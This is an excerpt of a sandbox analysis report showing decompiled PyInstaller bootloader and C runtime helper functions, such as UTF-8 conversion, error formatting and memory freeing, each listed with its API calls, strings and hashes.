                            • Instruction ID: 01eafe51a3292121ffa7dc98ac17cfba8eb1c174b0c88a0499ea6d7a30a8fdf1
                            • Opcode Fuzzy Hash: 145f39dbe073f4c18607e04b04c74ebafb8467eb685fea9a1f4eebbeaa29d367
                            • Instruction Fuzzy Hash: 9F519E74A00289AFDF10CFA8D895AEEFBF8EF19300F14459BE955E7352E6709941CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 56%
                            			E00BC4D40(void* __ecx, void* __edx, void* __eflags) {
                            				int* _t18;
                            				short* _t21;
                            				char* _t22;
                            				short* _t28;
                            				int* _t31;
                            				void* _t34;
                            				short* _t36;
                            				int* _t41;
                            				signed int _t42;
                            				char* _t44;
                            				int _t45;
                            				void* _t46;
                            				void* _t47;
                            				void* _t48;
                            
                            				_t34 = __edx;
                            				_t44 =  *(_t46 + 0x14);
                            				_push(4);
                            				_push( &(_t44[1]));
                            				_t18 = E00BC97F8(__ecx);
                            				_t31 = _t18;
                            				_t47 = _t46 + 8;
                            				if(_t31 != 0) {
                            					_t36 = 0;
                            					__eflags = _t44;
                            					if(_t44 <= 0) {
                            						L17:
                            						_t31[_t44] = 0;
                            						return _t31;
                            					} else {
                            						_t41 = _t31;
                            						_t21 =  *(_t47 + 0x20) - _t31;
                            						__eflags = _t21;
                            						 *(_t47 + 0x20) = _t21;
                            						while(1) {
                            							_t22 =  *(_t21 + _t41);
                            							 *(_t47 + 0x28) = _t22;
                            							_t45 = MultiByteToWideChar(0xfde9, 0, _t22, 0xffffffff, 0, 0);
                            							__eflags = _t45;
                            							if(__eflags == 0) {
                            								break;
                            							}
                            							_t7 = _t45 + 1; // 0x1
                            							_push(2);
                            							_push(_t7);
                            							_t28 = E00BC97F8(_t7);
                            							_t47 = _t47 + 8;
                            							 *(_t47 + 0x14) = _t28;
                            							__eflags = _t28;
                            							if(__eflags == 0) {
                            								_push("Out of memory.");
                            								_push("win32_utils_from_utf8");
                            								goto L13;
                            							} else {
                            								__eflags = MultiByteToWideChar(0xfde9, 0,  *(_t47 + 0x1c), 0xffffffff, _t28, _t45);
                            								if(__eflags == 0) {
                            									_push("Failed to decode wchar_t from UTF-8\n");
                            									L12:
                            									_push("MultiByteToWideChar");
                            									L13:
                            									E00BC1860(_t34, __eflags);
                            									_t48 = _t47 + 8;
                            									 *_t41 = 0;
                            									_t42 = 0;
                            									__eflags = _t36;
                            									if(_t36 >= 0) {
                            										do {
                            											L00BC9803(_t31[_t42]);
                            											_t42 = _t42 + 1;
                            											_t48 = _t48 + 4;
                            											__eflags = _t42 - _t36;
                            										} while (_t42 <= _t36);
                            									}
                            									L00BC9803(_t31);
                            									__eflags = 0;
                            									return 0;
                            								} else {
                            									_t36 =  &(_t36[0]);
                            									_t44 =  *(_t47 + 0x1c);
                            									 *_t41 =  *(_t47 + 0x14);
                            									_t41 =  &(_t41[1]);
                            									__eflags = _t36 - _t44;
                            									if(_t36 >= _t44) {
                            										goto L17;
                            									} else {
                            										_t21 =  *(_t47 + 0x20);
                            										continue;
                            									}
                            								}
                            							}
                            							goto L18;
                            						}
                            						_push("Failed to get wchar_t buffer size.\n");
                            						goto L12;
                            					}
                            				} else {
                            					return _t18;
                            				}
                            				L18:
                            			}

                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,00BC3951,?,00000000,00BC3951,?), ref: 00BC4D95
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00BC4DC6
                            Strings
                            • win32_utils_from_utf8, xrefs: 00BC4DF4
                            • Failed to decode wchar_t from UTF-8, xrefs: 00BC4DE8
                            • Failed to get wchar_t buffer size., xrefs: 00BC4DFB
                            • Out of memory., xrefs: 00BC4DEF
                            • MultiByteToWideChar, xrefs: 00BC4E00
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide
                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                            • API String ID: 626452242-306716450
                            • Opcode ID: b3573bf4c4e7b8f9ecc88eb43def07850e1e97b5e526299cc39971abc61b2bab
                            • Instruction ID: cf3def644b206bb238328fd3874dd2d9a3446437fa9dae6841cab5b85c1d0b44
                            • Opcode Fuzzy Hash: b3573bf4c4e7b8f9ecc88eb43def07850e1e97b5e526299cc39971abc61b2bab
                            • Instruction Fuzzy Hash: 9F318975644306ABD7206F98AC82F6A77D4FB40711F5009BEFD54A72C1EBB6DA0483A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E00BD534A(char* _a4, short* _a8) {
                            				int _v8;
                            				void* __ecx;
                            				short* _t10;
                            				short* _t14;
                            				int _t15;
                            				short* _t16;
                            				void* _t26;
                            				int _t27;
                            				void* _t29;
                            				short* _t35;
                            				short* _t39;
                            				short* _t40;
                            
                            				_push(_t29);
                            				if(_a4 != 0) {
                            					_t39 = _a8;
                            					__eflags = _t39;
                            					if(__eflags != 0) {
                            						_push(_t26);
                            						E00BD369E(_t29, __eflags);
                            						asm("sbb ebx, ebx");
                            						_t35 = 0;
                            						_t27 = _t26 + 1;
                            						 *_t39 = 0;
                            						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
                            						_v8 = _t10;
                            						__eflags = _t10;
                            						if(_t10 != 0) {
                            							_t40 = E00BD0A25(_t29, _t10 + _t10);
                            							__eflags = _t40;
                            							if(_t40 != 0) {
                            								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
                            								__eflags = _t15;
                            								if(_t15 != 0) {
                            									_t16 = _t40;
                            									_t40 = 0;
                            									_t35 = 1;
                            									__eflags = 1;
                            									 *_a8 = _t16;
                            								} else {
                            									E00BCC998(GetLastError());
                            								}
                            							}
                            							E00BD09EB(_t40);
                            							_t14 = _t35;
                            						} else {
                            							E00BCC998(GetLastError());
                            							_t14 = 0;
                            						}
                            					} else {
                            						 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            						E00BD1788();
                            						_t14 = 0;
                            					}
                            					return _t14;
                            				}
                            				 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            				E00BD1788();
                            				return 0;
                            			}

                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f5d496da00d05b00d685c724ae7b097f20b7ef6cf87ccefa8f7b67ef8f595670
                            • Instruction ID: 9c514c1f68b48b2b0c038c5a350ed9ae3245a527de983abca79bc07780d23082
                            • Opcode Fuzzy Hash: f5d496da00d05b00d685c724ae7b097f20b7ef6cf87ccefa8f7b67ef8f595670
                            • Instruction Fuzzy Hash: C211E472514618BBCB213F799C44E6BBBECEB81770B2006AAF816C7341FA7089418671
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BD7F23(intOrPtr _a4) {
                            				void* _t18;
                            
                            				_t45 = _a4;
                            				if(_a4 != 0) {
                            					E00BD7EE7(_t45, 7);
                            					E00BD7EE7(_t45 + 0x1c, 7);
                            					E00BD7EE7(_t45 + 0x38, 0xc);
                            					E00BD7EE7(_t45 + 0x68, 0xc);
                            					E00BD7EE7(_t45 + 0x98, 2);
                            					E00BD09EB( *((intOrPtr*)(_t45 + 0xa0)));
                            					E00BD09EB( *((intOrPtr*)(_t45 + 0xa4)));
                            					E00BD09EB( *((intOrPtr*)(_t45 + 0xa8)));
                            					E00BD7EE7(_t45 + 0xb4, 7);
                            					E00BD7EE7(_t45 + 0xd0, 7);
                            					E00BD7EE7(_t45 + 0xec, 0xc);
                            					E00BD7EE7(_t45 + 0x11c, 0xc);
                            					E00BD7EE7(_t45 + 0x14c, 2);
                            					E00BD09EB( *((intOrPtr*)(_t45 + 0x154)));
                            					E00BD09EB( *((intOrPtr*)(_t45 + 0x158)));
                            					E00BD09EB( *((intOrPtr*)(_t45 + 0x15c)));
                            					return E00BD09EB( *((intOrPtr*)(_t45 + 0x160)));
                            				}
                            				return _t18;
                            			}

                            APIs
                              • Part of subcall function 00BD7EE7: _free.LIBCMT ref: 00BD7F10
                            • _free.LIBCMT ref: 00BD7F71
                              • Part of subcall function 00BD09EB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?), ref: 00BD0A01
                              • Part of subcall function 00BD09EB: GetLastError.KERNEL32(?,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?,?), ref: 00BD0A13
                            • _free.LIBCMT ref: 00BD7F7C
                            • _free.LIBCMT ref: 00BD7F87
                            • _free.LIBCMT ref: 00BD7FDB
                            • _free.LIBCMT ref: 00BD7FE6
                            • _free.LIBCMT ref: 00BD7FF1
                            • _free.LIBCMT ref: 00BD7FFC
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 3345dd58f07dd0924e1d91aec4a26e5c9fbf2f87a575c696f6c07352f37f02c3
                            • Instruction ID: 63f9fc22c0b94d94932f4f06dc004502d8ccbe256d5072f0950a5feac83b5c62
                            • Opcode Fuzzy Hash: 3345dd58f07dd0924e1d91aec4a26e5c9fbf2f87a575c696f6c07352f37f02c3
                            • Instruction Fuzzy Hash: A6110A71595B14ABE620FBB1CC17FCBF7DCAF04700F404C9AB299A6692FA79AD048750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 28%
                            			E00BC4BF0(short* _a4, char* _a8, int _a12) {
                            				void* _t17;
                            				void* _t18;
                            				int _t19;
                            				short* _t20;
                            				void* _t21;
                            
                            				_t20 = _a4;
                            				if(_t20 != 0) {
                            					_t19 = _a12;
                            					goto L6;
                            				} else {
                            					_t19 = MultiByteToWideChar(0xfde9, _t20, _a8, 0xffffffff, _t20, _t20);
                            					_t26 = _t19;
                            					if(_t19 != 0) {
                            						_t3 = _t19 + 1; // 0x1
                            						_push(2);
                            						_t20 = E00BC97F8(_t17);
                            						_t21 = _t21 + 8;
                            						__eflags = _t20;
                            						if(__eflags != 0) {
                            							L6:
                            							__eflags = MultiByteToWideChar(0xfde9, 0, _a8, 0xffffffff, _t20, _t19);
                            							if(__eflags != 0) {
                            								return _t20;
                            							} else {
                            								_push("Failed to decode wchar_t from UTF-8\n");
                            								_push("MultiByteToWideChar");
                            								E00BC1860(_t18, __eflags);
                            								__eflags = 0;
                            								return 0;
                            							}
                            						} else {
                            							_push("Out of memory.");
                            							_push("win32_utils_from_utf8");
                            							E00BC1860(_t18, __eflags);
                            							__eflags = 0;
                            							return 0;
                            						}
                            					} else {
                            						_push("Failed to get wchar_t buffer size.\n");
                            						_push("MultiByteToWideChar");
                            						E00BC1860(_t18, _t26);
                            						return 0;
                            					}
                            				}
                            			}

                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,00BC4117,?,?,00001000), ref: 00BC4C08
                              • Part of subcall function 00BC1860: GetLastError.KERNEL32(?,?), ref: 00BC187D
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?,?,?,00BC4117,?,?,00001000), ref: 00BC4C69
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                            • API String ID: 1717984340-306716450
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 63%
                            			E00BC4860(void* __edx, signed int _a8192, long _a8200) {
                            				short _v0;
                            				signed int _t8;
                            				long _t10;
                            				long _t11;
                            				void* _t24;
                            				signed int _t26;
                            
                            				_t24 = __edx;
                            				E00BC7880();
                            				_t8 =  *0xbec008; // 0xdc55bb75
                            				_a8192 = _t8 ^ _t26;
                            				_t10 = _a8200;
                            				if(_t10 == 0) {
                            					_t10 = GetLastError();
                            				}
                            				_t11 = FormatMessageW(0x1000, 0, _t10, 0x400,  &_v0, 0x1000, 0);
                            				_t32 = _t11;
                            				if(_t11 != 0) {
                            					__eflags = E00BC4C90(0xbf4a58,  &_v0, 0x1000);
                            					_t19 =  !=  ? 0xbf4a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
                            					_t14 =  !=  ? 0xbf4a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
                            					__eflags = _a8192 ^ _t26 + 0x0000000c;
                            					E00BC786A();
                            					return  !=  ? 0xbf4a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
                            				} else {
                            					_push("No error messages generated.\n");
                            					_push("FormatMessageW");
                            					E00BC1860(_t24, _t32);
                            					E00BC786A();
                            					return "PyInstaller: FormatMessageW failed.";
                            				}
                            			}










                            APIs
                            • GetLastError.KERNEL32(00BC18B9,00000000,?,?,?,00000400,?,00000000,?), ref: 00BC4883
                              • Part of subcall function 00BC4C90: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00BC48EC,00BF4A58,?,00001000,?,?), ref: 00BC4CAA
                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,00BC18B9,00000000,?,?,?,00000400,?,00000000,?), ref: 00BC48A2
                            Strings
                            • PyInstaller: FormatMessageW failed., xrefs: 00BC48BE
                            • PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 00BC48EF
                            • No error messages generated., xrefs: 00BC48AC
                            • FormatMessageW, xrefs: 00BC48B1
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharErrorFormatLastMessageMultiWide
                            • String ID: FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.
                            • API String ID: 1653872744-3268588819
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E00BD8F51(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                            				signed int _v8;
                            				int _v12;
                            				void* _v24;
                            				signed int _t49;
                            				signed int _t54;
                            				int _t56;
                            				signed int _t58;
                            				short* _t60;
                            				signed int _t64;
                            				short* _t68;
                            				int _t76;
                            				short* _t79;
                            				signed int _t85;
                            				signed int _t88;
                            				void* _t93;
                            				void* _t94;
                            				int _t96;
                            				short* _t99;
                            				int _t101;
                            				int _t103;
                            				signed int _t104;
                            				short* _t105;
                            				void* _t108;
                            
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t49 =  *0xbec008; // 0xdc55bb75
                            				_v8 = _t49 ^ _t104;
                            				_t101 = _a20;
                            				if(_t101 > 0) {
                            					_t76 = E00BDCA63(_a16, _t101);
                            					_t108 = _t76 - _t101;
                            					_t4 = _t76 + 1; // 0x1
                            					_t101 = _t4;
                            					if(_t108 >= 0) {
                            						_t101 = _t76;
                            					}
                            				}
                            				_t96 = _a32;
                            				if(_t96 == 0) {
                            					_t96 =  *( *_a4 + 8);
                            					_a32 = _t96;
                            				}
                            				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                            				_v12 = _t54;
                            				if(_t54 == 0) {
                            					L38:
                            					E00BC786A();
                            					return _t54;
                            				} else {
                            					_t93 = _t54 + _t54;
                            					_t83 = _t93 + 8;
                            					asm("sbb eax, eax");
                            					if((_t93 + 0x00000008 & _t54) == 0) {
                            						_t79 = 0;
                            						__eflags = 0;
                            						L14:
                            						if(_t79 == 0) {
                            							L36:
                            							_t103 = 0;
                            							L37:
                            							E00BD815E(_t79);
                            							_t54 = _t103;
                            							goto L38;
                            						}
                            						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                            						_t119 = _t56;
                            						if(_t56 == 0) {
                            							goto L36;
                            						}
                            						_t98 = _v12;
                            						_t58 = E00BD3980(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                            						_t103 = _t58;
                            						if(_t103 == 0) {
                            							goto L36;
                            						}
                            						if((_a12 & 0x00000400) == 0) {
                            							_t94 = _t103 + _t103;
                            							_t85 = _t94 + 8;
                            							__eflags = _t94 - _t85;
                            							asm("sbb eax, eax");
                            							__eflags = _t85 & _t58;
                            							if((_t85 & _t58) == 0) {
                            								_t99 = 0;
                            								__eflags = 0;
                            								L30:
                            								__eflags = _t99;
                            								if(__eflags == 0) {
                            									L35:
                            									E00BD815E(_t99);
                            									goto L36;
                            								}
                            								_t60 = E00BD3980(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                            								__eflags = _t60;
                            								if(_t60 == 0) {
                            									goto L35;
                            								}
                            								_push(0);
                            								_push(0);
                            								__eflags = _a28;
                            								if(_a28 != 0) {
                            									_push(_a28);
                            									_push(_a24);
                            								} else {
                            									_push(0);
                            									_push(0);
                            								}
                            								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                            								__eflags = _t103;
                            								if(_t103 != 0) {
                            									E00BD815E(_t99);
                            									goto L37;
                            								} else {
                            									goto L35;
                            								}
                            							}
                            							_t88 = _t94 + 8;
                            							__eflags = _t94 - _t88;
                            							asm("sbb eax, eax");
                            							_t64 = _t58 & _t88;
                            							_t85 = _t94 + 8;
                            							__eflags = _t64 - 0x400;
                            							if(_t64 > 0x400) {
                            								__eflags = _t94 - _t85;
                            								asm("sbb eax, eax");
                            								_t99 = E00BD0A25(_t85, _t64 & _t85);
                            								_pop(_t85);
                            								__eflags = _t99;
                            								if(_t99 == 0) {
                            									goto L35;
                            								}
                            								 *_t99 = 0xdddd;
                            								L28:
                            								_t99 =  &(_t99[4]);
                            								goto L30;
                            							}
                            							__eflags = _t94 - _t85;
                            							asm("sbb eax, eax");
                            							E00BDF250();
                            							_t99 = _t105;
                            							__eflags = _t99;
                            							if(_t99 == 0) {
                            								goto L35;
                            							}
                            							 *_t99 = 0xcccc;
                            							goto L28;
                            						}
                            						_t68 = _a28;
                            						if(_t68 == 0) {
                            							goto L37;
                            						}
                            						_t123 = _t103 - _t68;
                            						if(_t103 > _t68) {
                            							goto L36;
                            						}
                            						_t103 = E00BD3980(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                            						if(_t103 != 0) {
                            							goto L37;
                            						}
                            						goto L36;
                            					}
                            					asm("sbb eax, eax");
                            					_t70 = _t54 & _t93 + 0x00000008;
                            					_t83 = _t93 + 8;
                            					if((_t54 & _t93 + 0x00000008) > 0x400) {
                            						__eflags = _t93 - _t83;
                            						asm("sbb eax, eax");
                            						_t79 = E00BD0A25(_t83, _t70 & _t83);
                            						_pop(_t83);
                            						__eflags = _t79;
                            						if(__eflags == 0) {
                            							goto L36;
                            						}
                            						 *_t79 = 0xdddd;
                            						L12:
                            						_t79 =  &(_t79[4]);
                            						goto L14;
                            					}
                            					asm("sbb eax, eax");
                            					E00BDF250();
                            					_t79 = _t105;
                            					if(_t79 == 0) {
                            						goto L36;
                            					}
                            					 *_t79 = 0xcccc;
                            					goto L12;
                            				}
                            			}



























                            APIs
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BCC00D,00BCC00D,?,?,?,00BD91A2,00000001,00000001,DEE85006), ref: 00BD8FAB
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BD91A2,00000001,00000001,DEE85006,?,?,?), ref: 00BD9031
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,DEE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BD912B
                            • __freea.LIBCMT ref: 00BD9138
                              • Part of subcall function 00BD0A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BD80E5,00000000,?,00BD0C3C,?,00000008,?,00BD3E2E,?,?,?), ref: 00BD0A57
                            • __freea.LIBCMT ref: 00BD9141
                            • __freea.LIBCMT ref: 00BD9166
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                            • String ID:
                            • API String ID: 1414292761-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E00BD4425(void* __ebx, void* __ecx, void* __edx) {
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr _t2;
                            				void* _t3;
                            				void* _t4;
                            				intOrPtr _t9;
                            				void* _t11;
                            				void* _t20;
                            				void* _t21;
                            				void* _t23;
                            				void* _t25;
                            				void* _t27;
                            				void* _t29;
                            				void* _t31;
                            				void* _t32;
                            				long _t36;
                            				long _t37;
                            				void* _t40;
                            
                            				_t29 = __edx;
                            				_t23 = __ecx;
                            				_t20 = __ebx;
                            				_t36 = GetLastError();
                            				_t2 =  *0xbec238; // 0x6
                            				_t42 = _t2 - 0xffffffff;
                            				if(_t2 == 0xffffffff) {
                            					L2:
                            					_t3 = E00BD0B10(_t23, 1, 0x364);
                            					_t31 = _t3;
                            					_pop(_t25);
                            					if(_t31 != 0) {
                            						_t4 = E00BD3862(_t25, __eflags,  *0xbec238, _t31);
                            						__eflags = _t4;
                            						if(_t4 != 0) {
                            							E00BD4297(_t25, _t31, 0xbf63f0);
                            							E00BD09EB(0);
                            							_t40 = _t40 + 0xc;
                            							__eflags = _t31;
                            							if(_t31 == 0) {
                            								goto L9;
                            							} else {
                            								goto L8;
                            							}
                            						} else {
                            							_push(_t31);
                            							goto L4;
                            						}
                            					} else {
                            						_push(_t3);
                            						L4:
                            						E00BD09EB();
                            						_pop(_t25);
                            						L9:
                            						SetLastError(_t36);
                            						E00BD0ACD(_t20, _t29, _t31, _t36);
                            						asm("int3");
                            						_push(_t20);
                            						_push(_t36);
                            						_push(_t31);
                            						_t37 = GetLastError();
                            						_t21 = 0;
                            						_t9 =  *0xbec238; // 0x6
                            						_t45 = _t9 - 0xffffffff;
                            						if(_t9 == 0xffffffff) {
                            							L12:
                            							_t32 = E00BD0B10(_t25, 1, 0x364);
                            							_pop(_t27);
                            							if(_t32 != 0) {
                            								_t11 = E00BD3862(_t27, __eflags,  *0xbec238, _t32);
                            								__eflags = _t11;
                            								if(_t11 != 0) {
                            									E00BD4297(_t27, _t32, 0xbf63f0);
                            									E00BD09EB(_t21);
                            									__eflags = _t32;
                            									if(_t32 != 0) {
                            										goto L19;
                            									} else {
                            										goto L18;
                            									}
                            								} else {
                            									_push(_t32);
                            									goto L14;
                            								}
                            							} else {
                            								_push(_t21);
                            								L14:
                            								E00BD09EB();
                            								L18:
                            								SetLastError(_t37);
                            							}
                            						} else {
                            							_t32 = E00BD380C(_t25, _t45, _t9);
                            							if(_t32 != 0) {
                            								L19:
                            								SetLastError(_t37);
                            								_t21 = _t32;
                            							} else {
                            								goto L12;
                            							}
                            						}
                            						return _t21;
                            					}
                            				} else {
                            					_t31 = E00BD380C(_t23, _t42, _t2);
                            					if(_t31 != 0) {
                            						L8:
                            						SetLastError(_t36);
                            						return _t31;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            			}

                            APIs
                            • GetLastError.KERNEL32(?,00000000,00BCAFEC,00000000,?,?,00BCA8EB,?,?,00000000), ref: 00BD4429
                            • _free.LIBCMT ref: 00BD445C
                            • _free.LIBCMT ref: 00BD4484
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00BD4491
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00BD449D
                            • _abort.LIBCMT ref: 00BD44A3
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorLast$_free$_abort
                            • String ID:
                            • API String ID: 3160817290-0
                            • Opcode ID: 12c55e01bb781a9f24ccbd1a4519845f7f918ff70cab3630febc994e88403ead
                            • Instruction ID: 36e19737e0e6cf9c598cf39b7217a6621bb24c38b263cc6a92e4612c95f34a03
                            • Opcode Fuzzy Hash: 12c55e01bb781a9f24ccbd1a4519845f7f918ff70cab3630febc994e88403ead
                            • Instruction Fuzzy Hash: 18F0283511070127C61233B96C8AB2FABE6DFC1B61F204197F5189B3A3FF708C825A12
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BCD000(void* __ebx, void* __edi, intOrPtr _a4) {
                            				void* __esi;
                            				void* _t4;
                            
                            				_t21 = __edi;
                            				_t10 = __ebx;
                            				if(_a4 != 0) {
                            					_t23 = E00BDF355(_a4, 0x2e);
                            					if(_t3 == 0 || E00BD51D5(__ebx, __edi, _t23, _t23, L".exe") != 0 && E00BD51D5(__ebx, __edi, _t23, _t23, L".cmd") != 0 && E00BD51D5(_t10, _t21, _t23, _t23, L".bat") != 0 && E00BD51D5(_t10, _t21, _t23, _t23, L".com") != 0) {
                            						_t4 = 0;
                            					} else {
                            						_t4 = 1;
                            					}
                            					return _t4;
                            				} else {
                            					return 0;
                            				}
                            			}

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
